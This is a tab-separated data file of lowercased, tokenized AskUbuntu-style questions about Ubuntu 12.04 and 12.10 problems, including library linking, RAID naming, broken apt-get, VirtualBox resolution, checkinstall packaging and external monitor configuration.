211132	linker can not find libcv	the package i am building on precise instructs me to install opencv using synaptic to get libcv-dev libcvaux-dev and libhighgui-dev . so i opened up synaptic and checked the boxes and downloaded these packages . now i did a make and ended up with : usr/bin/ld can not find -lcv usr/bin/ld can not find -lcvaux usr/bin/ld can not find -lhighgui i have tried downloading the non '' -dev '' opencv packages . no change . downloaded opencv tarball , spent 45 minutes watching it cmake . make , make install . same errors when i tried to compile my package . i looked on an older lucid machine where the package was built a couple of years ago . i compares the output of locate libcv with the new machine . the old machine shows libcv.so.4.0.0 etc and libcvaux.so ... and libhighgui.so ... the new machine shows no such things . i 'm willing to bet the new machine and new install may be later than the old ones , but they the lib files are completely missing . anyone know how to resolve this ? google has proven of not much use . i am really concerned that the 12.04 install vers ion is so wildly different from the 10.04 versionb that i ca n't just compile my package . my new build machine is a dell r330 server adn all i get from goole is `` do n't even try a build older than 11.10 . i opted for lts so went with 12.04 .
211136	get the audio from line-in to output to the speaker	i have connected a console to the line-in of my computer . how can i make it so that the sound comes out of the speakers ? i 've tried alsamixer and it didnt help im using ubuntu 12.04
211139	how can i run two skype accounts on the same ubuntu ?	it is possible if i use windows . can i do the same thing in ubuntu ? in windows all i have to do is : in the run window , enter the following command ( include the quotes ) and press ok : '' c : \program files\skype\phone\skype.exe '' /secondary i know you can use pidgin or empathy but i want to do this feature using the official skype account . thanks
211142	partial wine packages wo n't remove completely	i 've looked at a few answers for this problem apt-get commands to remove clean and purge packages . i 've also tried removing the leftover packages by name but that does not work either . only one of the remaining packages is functional , and that is browse c : \ drive . i tried reinstalling wine , but it failed do to unmet dependencies . any ideas ?
211144	copy hangs in local network	i want to copy files from one ubuntu system to another.they are both in local wireless network . i shared entire home dir on one , and tried to copy some files to another . it works for some time and then it just hangs at some point . i use nautilus to copy files . here is the example screenshot , it just hangs like this : after i cancel , nautilus icon in lauchbar keeps progress bar , so i guess there is some problem . what can be the problem ?
211150	mouse disappears when i click or scroll	i 've reinstalled 12.04* and now when i click or scroll : the pointer disappears . it still functions perfectly though . *my dvd drive does n't work and my machine ca n't boot from usb so i actually took out the hard drive and reinstalled using another machine ( including different mouse etc ) so maybe it is related to that ?
211152	problems installing vtk on ubuntu	when i try to install vtk with command ccmake . i get these errors : cmake error : the following variables are used in this project , but they are set to notfound . please set them or make sure they are set and tested correctly in the cmake files : opengl_include_dir ( advanced ) used as include directory in directory /home/me/masast/vtk used as include directory in directory /home/me/masast/vtk/wrapping used as include directory in directory /home/me/masast/vtk/utilities used as include directory in directory /home/me/masast/vtk/utilities/kwsys used as include directory in directory /home/me/masast/vtk/utilities/vtkzlib used as include directory in directory /home/me/masast/vtk/utilities/vtkhdf5 used as include directory in directory /home/me/masast/vtk/utilities/vtkhdf5/src used as include directory in directory /home/me/masast/vtk/utilities/vtkjpeg used as include directory in directory /home/me/masast/vtk/utilities/vtkpng used as include directory in directory /home/me/masast/vtk/utilities/vtktiff used as include directory in directory /home/me/masast/vtk/utilities/vtkexpat used as include directory in directory /home/me/masast/vtk/utilities/vtkfreetype used as include directory in directory /home/me/masast/vtk/utilities/vtklibxml2 used as include directory in directory /home/me/masast/vtk/utilities/dicomparser used as include directory in directory /home/me/masast/vtk/utilities/materiallibrary used as include directory in directory /home/me/masast/vtk/utilities/vtklibproj4 used as include directory in directory /home/me/masast/vtk/utilities/mrmpi used as include directory in directory /home/me/masast/vtk/utilities/mrmpi/mpistubs used as include directory in directory /home/me/masast/vtk/utilities/mrmpi/src used as include directory in directory /home/me/masast/vtk/utilities/verdict used as include directory in directory /home/me/masast/vtk/utilities/vtknetcdf used as include directory in directory /home/me/masast/vtk/utilities/vtkmetaio . . . i use my ubuntu in turkish , so my desktop directory is named `` masa端st端 '' . as you can see in errors it is used by ccmake as `` masast '' . my opinion is , this causes the problem but i 'm not sure . is it ? or is the problem originated from another reason ? how can i solve this and install vtk succesfully ? edit i moved the directory to home , but problem still exists . cmake error at cmake/vtkwrappythonsip.cmake:85 ( message ) : sip_executable not set . call stack ( most recent call first ) : cmake/kitcommonpythonwrapblock.cmake:24 ( vtk_create_sip_module ) cmake/kitcommonblock.cmake:52 ( include ) common/cmakelists.txt:555 ( include ) cmake error at cmake/vtkwrappythonsip.cmake:85 ( message ) : sip_executable not set . call stack ( most recent call first ) : cmake/kitcommonpythonwrapblock.cmake:24 ( vtk_create_sip_module ) cmake/kitcommonblock.cmake:52 ( include ) filtering/cmakelists.txt:396 ( include ) cmake error at cmake/vtkwrappythonsip.cmake:85 ( message ) : sip_executable not set . call stack ( most recent call first ) : cmake/kitcommonpythonwrapblock.cmake:24 ( vtk_create_sip_module ) cmake/kitcommonblock.cmake:52 ( include ) imaging/cmakelists.txt:184 ( include ) cmake error at cmake/vtkwrappythonsip.cmake:85 ( message ) : sip_executable not set . call stack ( most recent call first ) : cmake/kitcommonpythonwrapblock.cmake:24 ( vtk_create_sip_module ) cmake/kitcommonblock.cmake:52 ( include ) graphics/cmakelists.txt:363 ( include ) cmake error at cmake/vtkwrappythonsip.cmake:85 ( message ) : sip_executable not set . call stack ( most recent call first ) : cmake/kitcommonpythonwrapblock.cmake:24 ( vtk_create_sip_module ) cmake/kitcommonblock.cmake:52 ( include ) genericfiltering/cmakelists.txt:31 ( include ) cmake error at cmake/vtkwrappythonsip.cmake:85 ( message ) : sip_executable not set . call stack ( most recent call first ) : cmake/kitcommonpythonwrapblock.cmake:24 ( vtk_create_sip_module ) cmake/kitcommonblock.cmake:52 ( include ) io/cmakelists.txt:457 ( include )
211157	pppoe wireless connection , ubuntu 12.4	i recently bought a new computer ( asus 1015 cx ) with ubuntu ( 12.4 ) as preinstalled system . my problem is with the internet . the computer connects just fine to the free wifi we have at home , but in college , we have a little bit different system . there is wifi , but it is not free - everyone receives a user name and a password . i cant manage to estabilish this pppoe connection - the computer `` sees '' where can it connect , but i dont know where to write my username and password . it is not the dsl connection , what i have already tried . can you help me ?
211163	virtualbox , how do i change guest ( precise ) resolution to 16:9 ( 1920x1080 ) instead of default 4:3 ?	there are many questions about resolution issues on askubuntu but no question/solution seems to solve my issue . i 've a 12.04/precise host system and installed ubuntu 12.04/precise as guest system as well . after installation i had the option of selecting 1024x768 ( 4:3 ) and 800x600 ( 4:3 ) as resolution in display settings . after installing guest additions the options 1280x960 ( 4:3 ) and 1440x1050 ( 4:3 ) was added to the list . now 4 in total all having the 4:3 ratio . i then activated full screen mode ( host+f ) and got the guest running in native 1920x1200 ( 16:10 ) for my screen . after deactivating full screen two more options had been added to the resolutions dropdown list , 1920x1200 ( 16:10 ) and 1600x1200 ( 4:3 ) . i want to run the guest in 1920x1080 ( 16:9 ) so i can easily record screencasts in `` full-hd '' . last time i had this problem the solution was to run `` vboxmanage controlvm nameofyourvm setvideomodehint width height colordepth '' command from the host but now i want to know if there is any easier way to solve this ?
211164	mount external hd ubuntu 12.10	although it 's an abundantly treated matter , i 'm unable to find an answer valid for my needs . i had a 12.04 installation of ubuntu and i decided to install the 12.10 . i copied ( using gparted ) the partition where my system was to an external hd where there is a windows partition . then i installed the newest ubuntu version and now i want to take back some files ( for example my .emacs ) from that partition but when i try to mount it , it is not found as sdb and if i mount it from /dev/usb/hddev0 i do n't get any output , only a blinking cursor , no errors , no output . i even tried to mount it as an ntfs disk but the result was the same . it 's like the hd can not be detected . so how can i access data to that disk ? could i get them from gparted terminal instead of ubuntu one ? thanks
211166	how to extract only pictures from html directories	i have over 200 html files , each containing a png format picture , stored on my harddisk . how can i extract those pictures into a separate folder easily ?
211172	can not see user desktop ( applications , places , system ... ) when i log in	i am very new to ubuntu . i recently got a new laptop running windows 7 . i am using virtual box and just installed the ubuntu 12.10 iso as a new virtual machine within virtual box . everything seemed to install just fine and i even added the guest additions under devices . the problem is that i can not see the menus and my login information . the virtual machine says it is running ; however , i do not have the applications , places , system , etc . tray to select from . is there something i am supposed to do after logging in to get this ? i entered my password and everything seemed fine , i just do n't have those drop-down menus available ...
211173	how can i get ddclient to work with freedns ?	i use the dynamic dns service at freedns.afraid.org for my 12.04 server . i had assumed that the protocols would be standardised and that ddclient would just work , but apparently not . i get this message in /var/log/syslog : error : invalid update url ( 2 ) : unexpected status ( ) i tried to use the updated version of ddclient from the alternative ppa described in this answer , but then i hit this error : fatal : error loading the perl module digest : :sha1 needed for freedns update . fatal : on debian , the package libdigest-sha1-perl must be installed . and when i try to install that package , i get this : e : unable to locate package libdigest-sha1-perl which leads me to this bug report , which apparently has no solution . how to proceed ?
211175	i ca n't install my tl-wn422g in ubuntu 12.10	i have installed ubuntu 12.10 in my pc and removed windows 7 , but i have a problem with my tp link wn422g , it does not work , i try differents methodes to install it and it give no results . i need your help please , i am a bigenner of linux .
211177	i upgraded fron 12.04 to 12.10 and can not find my pictures	i did an upgrade installation ( not new ) but now i can not find my pictures . and the reason i did the upgrade version was to keep all of my `` old files '' intact . how can i find my pictures ?
211180	ubuntu server 12.04 , mdadm device number suddenly changes ?	i 'm facing a really annoying bug , i have set up a software raid1 with mdadm , and the setup went just ok with this results /dev/md/lucas.mgscreativa.com.ar:0 i have also configured mdadm.conf like this device /dev/sda /dev/sdb # auto-create devices with debian standard permissions create owner=root group=disk mode=0660 auto=yes # automatically tag new arrays as belonging to the local system homehost < system > # instruct the monitoring daemon where to send mail alerts mailaddr root # definitions of existing md arrays array /dev/md/lucas.mgscreativa.com.ar:0 metadata=1.2 name=lucas.mgscreativa.com.ar:0 uuid=c913486a : e62c7ea1 : cfb98b6b:253d1f62 and fstab configured like this /dev/md/lucas.mgscreativa.com.ar:0 /media/data ext4 defaults , noatime 0 0 but , some day , my array name suddenly changed from /dev/md/lucas.mgscreativa.com.ar:0 to /dev/md0 , so i have done some changes in fstab and mdadm.conf ( of course , after hours and hours of tryal and error ) and everything went just ok , but today , again , the md number changed from /dev/md0 to /dev/md127 ! ! ! what 's going on here ? is this a bug i guess . is there any way to fix the md number so my server can work as it shhould , without flaws ? thanks !
211183	very slow startup after update to 12.04	my hardware : dell latitude d600 laptop processor : intel pentium ( r ) 1.8 ghz memory 1.2 gib graphics r200 ( rv250 4c66 ) x86/mmx/sse2 tcl dri2 disk : 37.7 gb i did an update from 11. ? ? using the automatic system update that pops up when you switch/log on . ever since then when i switch on the machine it takes approximately one hour to get to the login screen . sometimes the actual login will take time too , but sometimes within a couple of minutes i am logged in . once i am logged in i find i can work normally , the response is not swift , but is neither too slow that i can not work . i was wondering if there was anything i could do to speed things up . i deliberately did not do a clean install from disk , because i did not want to loose settings on the machine .
211185	trouble connecting to the internet , strange ip problem	i 'm having trouble booting but that 's probably a separate question . when i run things like sudo apt-get update , i get a massive array of error messages , all of them reading something along the lines of failed to fetch < domain and path > something wicked happened resolving < domain > . i saw in another post running the command ifconfig , i do n't see my ip address anywhere in the text that command returns , i 'm not sure if i 'm supposed to . whenever i try to ping something such as ping google.com i get ping : unknown host google.com . i pinged my ip and got the following : ping < my ip > ( < my ip > ) 56 ( 84 ) bytes of data . from < 169.254.* . ** ip > icmp_seq=1 destination host unreachable from < 169.254.* . ** ip > icmp_seq=2 destination host unreachable from < 169.254.* . ** ip > icmp_seq=3 destination host unreachable -- - < my ip > ping statistics -- - 5 packets transmitted , 0 received , +3 errors , 100 % packet loss , time 4000ms pipe 4 any idea what 's going on ?
211189	why is ubuntu.com notifying that they use cookies ?	over the past few days , i 've noticed a fixed banner on the header of ubuntu.com that states the following : did canonical or ubuntu have legal or ethical issues with cookies lately ? i have n't seen a site notify that blatantly that they use cookies since ~1999 .
211191	desk top gone after changing driver	ok , i am an ubuntu complete newbie , and while i was trying to get to know my new system better , it seems that i changed the screen or the video driver to something wrong , and the desktop was gone , only one big picture , no sidebar no icons ... nothing . i tried to reinstall ubuntu ( 12.04 ) but no use . i run firefox by launching the terminal ( ctrl+alt+t ) and write the name of the program just as it is `` firefox '' and it worked with me ! any advice ? unfortunately i chose to install it to work beside the win7 and now i have multi-boot , if this is information is going to be useful for you .
211192	canonicals skype repository disturbes updates ( apt-get )	following situation : i tried to install skype wie the usc , but uninstalled it again since it was an old version and did not work correctly . so i installed skype from skypes website . but it seems like there is a problem with the old skype repository . the update manager wont update , apt-get gives error messages : w : failed to fetch http : //archive.canonical.com/commercial-ppa-uploaders/skype/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found [ ip : 91.189.92.191 80 ] , w : failed to fetch http : //archive.canonical.com/commercial-ppa-uploaders/skype/ubuntu/dists/quantal/main/binary-i386/packages 404 not found [ ip : 91.189.92.191 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . it seems to be a canonical repository missing/not working . when i try to activate the repository in the package manager it says i 'm not allowed to , without asking for a password . i ca n't see how to activate them in the sources.list . i 'm on a fresh installed ubuntu 12.10 computer , without any old or backuped data . my internet connection works without any problems . i can post this text , ping the ips given in the error messages , everything works . except apt-get . update there seems to be an additional affection . i ca n't use auto-completion in terminal when i try to install something using `` sudo apt-get install package- ... '' which is also really annoying .
211195	power failure during upgrade	during upgrade from 12.04 to 12.10 there was a power failure . computer boots to desktop but without tools and menus to navigate . files that can be open can not be closed . sidebar menu does not exist . there is no function of the dvd drive , the usb drive nor the internet . possible to open grub but i am not familiar with it 's function . please help .
211201	how to activate subwoofer in inspiron 17r ?	i have a dell inspiron 17r , after a fresh install of 12.10 , the subwoofer seems to be not utilized . no sound comes from it and in the sound control panel the settings appear grayed out ( see screenshot ) . how can i activate the subwoofer ? i tried adding the line options snd-hda-intel model=dell in the file /etc/modprobe.d/alsa-base.conf and enable-lfe-remixing = yes default-sample-channels = 3 in the file /etc/pulse/daemon.conf , but still does n't work . edit : related question : subwoofer does n't work on dell inspiron 17r after upgrade to 13.10
211203	ubuntu 12.10 runs terribly slow on desktop	so i got to installing ubuntu 12.10 on a sony vaio desktop ( a sony vaio rs420 ) but it runs terribly slow . the windows load slow ( it wo n't even pull up terminal , but connects to wifi and opens firefox ) but the computer itself seems to run fine ( like when downloading files or moving files it works better than windows 7 ) . i did get an error about needed to update a language pack , but that 's it . what can i do to make this thing work correctly ? downgrade unity or gnome ? any help is appreciated .
211208	black screen on boot and wake - hp pavilion dv6	i failed to find a clean answer to this issue . hp pavilion dv6 , just installed ubuntu 12.10 after windows 7 got too annoying . ubuntu is currently the only os on the laptop . i used to only have 12.04 on here , and everything worked fine . anyways my issue is , every time i wake the computer from sleep mode , it only shows a black screen but still seems to be working according to the hdd light . a similar issue occurs every time i try booting the computer ; it boots to a purple screen , then turns black . but when i hold the power button and try again , it always boots just fine .
211210	dual monitors with displayport to hdmi	i have a lenovo t510 laptop running ubuntu 12.04 x64 . i can run dual monitors with my main display and internal , but not internal and displayport . the displayport is connected to a dp to hdmi converter , which works perfectly in windows . in ubuntu , when i connect the tv , the internal screen works , but the tv goes white , and the adapter gets really hot after a while . also the screen does n't show up in the displays menu even when i spam the detect displays button . also , according to ubuntu , there are no proprietary drivers for this system . the card is a nvidia . any solutions ?
211211	apt-get broken after termination in mid-install	long story short , i tried installing something via apt-get install and accidentally terminated the process through terminal . i now ca n't use apt-get install , ubuntu software center , etc . i tried running sudo apt-get clean and sudo apt-get autoclean , but to no avail . i then tried running sudo apt-get install -f , and got the following results : do you want to continue [ y/n ] ? y debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable ( reading database ... 216122 files and directories currently installed . ) preparing to replace libc6 2.15-0ubuntu10.2 ( using ... /libc6_2.15-0ubuntu10.3_i386.deb ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing /var/cache/apt/archives/libc6_2.15-0ubuntu10.3_i386.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/libc6_2.15-0ubuntu10.3_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i fix this error , or at least `` reset '' apt-get so i can install things again ?
211212	how to change font size of the login screen ?	i had installed ubuntu 12.04 on my netbook with maximum resolution of 1024x600 , i upgraded to ubuntu 12.10. occasionally i use other gui because it is more comfortable to me for certain tasks . since i updated i can not switch to another gui because i can not see and click on the ok button . how can i change the font size of the login sreen on ubuntu 12.10 ?
211216	while playing videos and jump some location in video it takes some more time to jump that location ?	i have dell insprion n5010 500 gb hd,4gb ram 1gb intell hd graphics i installed ubuntu 12.10 i 'm a new person to linux while playing videos the player keep on struggling also the system start up time is too slow . help to improve it i have dell insprion in that there is option to disable the battery charging in windows but in linux not how to enable this option
211219	cisco compatible vpn option not visible	i have installed vpnc and network-manager-vpnc , but when using network-manager to add a vpn connection , the cisco compatible is not available , only ptpp .
211223	having issues installing graphics drivers for nvidia geforce gtx 460 on ubuntu 12.10	i recently got ubuntu 12.10 x64 , and while trying to install the drivers for my nvidia geforce gtx 460 , i ran into trouble . i could n't download the linux version off the site , and i tried running the directions listed here : ubuntu 12.04 nvidia gtx 460 video card installation . neither of these have worked for me . any tips or other commands a noob could try ?
211225	gnome-open window positioning	i 've been using ubuntu since 10.04 , and seriously loving life . i 'm on 12.04 and it 's great . as some super users would know : gnome-open /home/username/somefile.txt will open a window in gnome . is it possible to open a window and place it a corner of the window from the command line ? gnome-open /home/username/somefile.txt -top -left ( i know the command is made up ) this would be the equivalent of opening the file and pressing ctrl + alt + 9 . thank you all
211228	applications/software required after installing 12.10	for the first time , i have installed ubuntu in my laptop . i have installed the latest version i.e 12.10 , but i am facing the following issues after installation : i could not connect my reliance data card to it . if i play a song it is asking me python software to install . also could not find the players in it . hence , can any one please let me know the necessary software for a new linux user . can any one please help me out in learning new things in linux ?
211231	bottom panel disappears when a new message arrives on empathy in gnome shell remix 12.10	every time a contact sends a message ( just when its window is closed ) , the bottom panel with message tray disappears . i have to press alt+f2 and `` r '' and back to normal . why it 's happening ?
211234	chainload boot of ubuntu installed on 32gb sd card from legacy grub boot on usb	i have ubuntu installed on a 32 gb sd card ( in the storage expansion slot on an acer aspire one ) with grub2 installed in the same partition . i boot into legacy grub on a usb drive and would like to boot by chainloading grub2 from grub ( kernel/initrd or symlink booting would also be fine ) , but i have n't figured out how to do this from legacy grub cli . output from blkid for this partition is /dev/mmcblk0p1 : label= '' ubuntu '' uuid= '' 7ceb9fa7-238c-4c5d-bb8e-2c655652ddec '' type='ext4 '' / fdisk -lu information boot indicator id 83 . related entries in grub.cfg : search -- no-floppy -- fs-uuid -- set-root 7ceb9fa7-238c-4c5d-bb8e-2c655652ddec linux /boot/vmlinuz-3.5.0-17-generic root=uuid=7ceb9fa7-238c-4c5d-bb8e-2c655652ddec ... initrd /boot/initrd.img-3.5.0-17-generic i ca n't seem to replicate this in legacy grub . is there any way get grub2 to chainload ? how do i set root with uuid in legacy grub ? i prefer to boot from usb . would grub2 on usb ( copying the grub.cfg generated during installation ) be an option ?
211238	problems with booting without usb support from bios	i have installed xubuntu 12.04 in an 60 gb usb 2.0 external hdd . i have been using that rather than my desktop . recently i found myself in a fairly remote part of a third world country , with a very unreliable internet connections , a few laptops -- none of which boots off a usb . i did not expect that ; it made things very difficult for me because i rely a lot on what i have in the xubuntu in my hd . upon my return i have been looking for a solution to the problem of booting my hd when there is no bios support for usbs . i ran into plop . i copied the plop boot manager to a cd but it did not recognize my external hd . i also tried plopkexec . plopkexec recognizes my flashdrive containing knoppix and can boot that up . but it does not recognize the ext hd containing the xubuntu . i am not much of a tech head . can someone please explain why plopkexec can not detect my ext hd , but can detect and boot the knoppix rescue system in the usb flash drive ? does anyone know of an alternative to plopkexec that i can use to boot the external hd ? i am under the impression that linux boot disks and/or rescue disks should be able to boot my external usb hd regardless of bios support . can someone recommend any that can actually do it . despite much googling , i have n't found any that actually highlights the feature .
211249	how do i remove webapps completely ?	i 'd like to be able to remove webapps from my system , i do n't want any of the packages associated with it . but trying to remove it i am told there are several other packages that require it . please change this , i do n't like the idea of webapps and i want it gone .
211250	how to copy many files to clipboard from the command line ?	suppose you have different files in a directory : one.txt , two.jpg , three.pdf , four.jpg etc . you want to copy them all to clipboard from the command line . something like copyclipboard * . how do you do it ? based on this answer , which solves for a particular case , but has the filetype hardcoded in the script . i wonder if there is a more general solution .
211251	how to remove entry of ubuntu 12.04 from windows bootloader while used ( wubi installation ) ?	a few months i decided to install ubuntu 12.04 on my pc alongside with my windows 7 partition . in order to do that and avoid any mistake , i followed the steps of this tutorial . everything was going well until i decided to update to the 12.10 release . i do n't know what happened , but after i updated my ubuntu , it stopped working , it did n't even launched , when i turned on my pc and choose to run `` ubuntu 12.04 '' on the grub screen , a weird messaged appeared . well , so i decided to install the ubuntu 12.10 and forget about the 12.04 partition , no problem . i erased the partitions used for the ubuntu 12.04 with easeus partition manager . however , when i start my pc , there is still the option of `` ubuntu 12.04 '' to chose , is that bad ? and what about now , can i use the windows installer of ubuntu to install the ubuntu 12.10 ? what should i do to have ubuntu 12.10 and windows 7 in dual boot again ?
211252	dell latitude will not boot after fresh ubuntu 12.10 installation . black screen	i have an old dell latitude d610 that i 've just installed ubuntu 12.10 onto , and now unfortunately it will not complete booting up . the screen flashes purple but then fades out and dies . i 'm fairly sure there is an issue with graphics drivers , as i had to turn on `` nomodeset '' in the options when installing off a dvd to see the installer , but i 'm very new to linux and do n't know terribly much at all apart from what i 've read on the net . i have been able to hold down shift and bring up grub , and entered into recovery mode , and when i enter into the low graphics mode , the xserver log file says it can detect a screen but found none with a useable configuration , then goes on to say a fatal server error has occurred and no screen have been found at all , telling me to check a log file at `` /var/log/xorg.0.log '' i have no idea how to check this specific log file ! attempting to actually go further than this in low graphics mode and restart the display simply artefacts the screen . it is all very strange and annoying because i did once by random have the machine boot completely for no apparent reason , but upon restarting the issue reoccurred .
211256	build .deb package from source , without installing it	suppose i have an installer program or source tarball for some program i want to install . ( there is no debian package available . ) first i want to create a .deb package out of it , in order to be able to cleanly remove the installed program in the future ( see uninstalling application built from source , if i build a package from source how can i uninstall or remove completely ? ) . also , installing using a package prevents it from clobbering files from other packages , which can not be guaranteed if you run the installer or sudo make install . checkinstall from reading the answers there and elsewhere , i gather the usual solution is to use checkinstall to build the package . unfortunately , it seems checkinstall does not prevent make install from clobbering system files from other packages . for example , according to reverting problems caused by checkinstall with gcc build : i created a debian package from the install using sudo checkinstall -d make install . [ ... ] i removed it using synaptic package manager . as it turns out , [ removing ] the package checkinstall created from make install tried to remove every single file the installation process touched , including shared gcc libraries like /lib64/libgcc_s.so . i then tried to tell checkinstall to build the package without installing it , in the hope of bypassing the issue . i created a dummy makefile : install : echo `` bogus '' > /bin/qwertyuiop and ran sudo checkinstall -- install=no . the file /bin/qwertyuiop was created , even though the package was not installed . in my case , i do not trust the installer / make install to not overwrite system files , so this use of checkinstall is ruled out . how can i build the package , without installing it or letting it touch system files ? is it possible to run checkinstall in a fakechrooted debootstrap environment to achieve this ? preferably the build should be done as a normal user rather than root , which would prevent the process from overwriting system files if it goes wrong .
211262	configure 27 '' 2560x1440 for a monitor with corrupt edid	i am trying to get a monitor work with my ubuntu laptop . the monitor is this cheap 27 '' korean monitors which has a 2560x1440 resolution -- and nothing else . here are some specifications of this monitor : 2560x1440 @ 60hz only one dual link dvi-d input -- no other input port ( no hdmi or display port ) no osd no scalar reports corrupt edid does 2560x1440 @ 60hz , did i say that already ? anyways , the monitor works beautifully with my ubuntu desktop which has an nvidia card with dvi output . however , i am having problem using this monitor with my laptop . after some searching around i found a few posts suggesting to use an active adaptor for mini display port , so i went and bought a mini display to dual link dvi-d adaptor.. when using this adaptor the monitor is recognized by nvidia-settings tool but with incorrect resolution information . as you can see the monitor is incorrectly recognized and there are no other resolution available to set . this post on ubuntu forums and this other post on overclock both suggest that the monitor is reporting corrupt edid file . i have tried following their instructions , but so far i have not been able to display any image on the monitor from my laptop . the laptop i am using is an asus g75vw with a 1920x1080 screen . it has a vga , an hdmi 1.4a , and a mini display port . the graphic card is an nvidia gforce gtx 660m with 2gb dedicated memory . i am running ubuntu 12.10 on here which i upgrade from 12.04 a few weeks ago . as i said i have tried several suggestions , including specifying modeline in xorg.conf and also linking to edid files i found from those forum posts above . however , i am not sure if the edid files i found are suitable for my monitor . i think the solution to my problem consist of obtaining the edid file of my monitor and then fixing it and modifying xorg.conf to force nvidia driver to load the correct resolution . however , i am not sure what steps i need to take to do this . here is the part of sudo xrandr -- prop output that is related to this monitor : dp-1 connected 800x600+1920+0 ( normal left inverted right x axis y axis ) 0mm x 0mm signalformat : displayport supported : displayport connectortype : displayport connectornumber : 3 ( 0x00000003 ) _connectorlocation : 3 ( 0x00000003 ) 800x600 60.3*+ i was expecting to see the edid file in this output as was mentioned in this post , but it is not there . i also tried adding the a new mode using xandr following this document.. here is what i did and the error i got : $ cvt 2560 1440 60 # 2560x1440 59.96 hz ( cvt 3.69m9 ) hsync : 89.52 khz ; pclk : 312.25 mhz modeline `` 2560x1440_60.00 '' 312.25 2560 2752 3024 3488 1440 1443 1448 1493 -hsync +vsync $ xrandr -- newmode `` 2560x1440_60.00 '' 312.25 2560 2752 3024 3488 1440 1443 1448 1493 -hsync +vsync $ xrandr -- addmode dp-1 `` 2560x1440_60.00 '' x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 39 current serial number in output stream : 40 i have no idea what this error is about . i tried adding another mode , this time using the gtf utility instead . that did not make any difference . here is the output of xrandr -q : xrandr -q screen 0 : minimum 8 x 8 , current 2720 x 1080 , maximum 16384 x 16384 vga-0 disconnected ( normal left inverted right x axis y axis ) lvds-0 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 382mm x 215mm 1920x1080 60.0*+ 40.0 dp-0 disconnected ( normal left inverted right x axis y axis ) hdmi-0 disconnected ( normal left inverted right x axis y axis ) dp-1 connected 800x600+1920+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 800x600 60.3*+ 2560x1440_60.00 ( 0x3f9 ) 312.2mhz h : width 2560 start 2752 end 3024 total 3488 skew 0 clock 89.5khz v : height 1440 start 1443 end 1448 total 1493 clock 60.0hz 2560x1440 ( 0x3fa ) 311.8mhz h : width 2560 start 2744 end 3024 total 3488 skew 0 clock 89.4khz v : height 1440 start 1441 end 1444 total 1490 clock 60.0hz and here is the closest thing i have to a working xorg.conf section `` serverlayout '' # removed option `` xinerama '' `` 0 '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' modelname `` dfp-3 '' horizsync 89.40 vertrefresh 60.00 # horizsync 43.95 # vertrefresh 30.00 modeline `` 2560x1440_60 '' 311.83 2560 2744 3024 3488 1440 1441 1444 1490 -hsync +vsync # modeline `` 2560x1440_30 '' 146.27 2560 2680 2944 3328 1440 1441 1444 1465 -hsync +vsync option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` chi mei optoelectronics corp. '' horizsync 44.4 - 67.1 vertrefresh 40.0 - 60.0 option `` dpms '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 660m '' busid `` pci:1:0:0 '' screen 1 endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 660m '' busid `` pci:1:0:0 '' screen 0 endsection section `` screen '' option `` stereo '' `` 0 '' # option `` nologo '' `` false '' # option `` useedid '' `` false '' # option `` useediddpi '' `` false '' # option `` useedidfreqs '' `` false '' option `` metamodes '' `` 2560x1440_60 '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` exactmodetimingsdvi '' `` true '' # option `` metamodes '' `` dfp-3 : 2560x1440_60 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 ; dfp-0 : nvidia-auto-select +0+0 ; dfp-0 : 1920x1080 +0+0 ; dfp-0 : 1920x1080_60 +0+0 ; dfp-0 : 1920x1080_40 +0+0 ; dfp-0 : nvidia-auto-select @ 1920x1024 +0+0 ; dfp-0 : nvidia-auto-select @ 1920x720 +0+0 ; dfp-0 : nvidia-auto-select @ 1920x768 +0+0 ; dfp-0 : nvidia-auto-select @ 1920x600 +0+0 ; dfp-0 : nvidia-auto-select @ 1920x480 +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' # option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 ; dfp-0 : nvidia-auto-select +0+0 ; dfp-0 : 1920x1080 +0+0 ; dfp-0 : 1920x1080_60 +0+0 ; dfp-0 : 1920x1080_40 +0+0 ; dfp-0 : nvidia-auto-select +0+0 ; dfp-0 : nvidia-auto-select +0+0 ; dfp-0 : nvidia-auto-select +0+0 ; dfp-0 : nvidia-auto-select +0+0 ; dfp-0 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection # section `` extensions '' # option `` composite '' `` disable '' # endsection after several hours of tweaking x configurations , i decided it was time to ask for help here . i would really appreciate if someone with experience regarding edid and x configuration could give me a hand to solve this issue .
211263	installing windows 7 alongside an existing ubuntu os	how can i install windows 7 along with my existing ubuntu 10.04 os ?
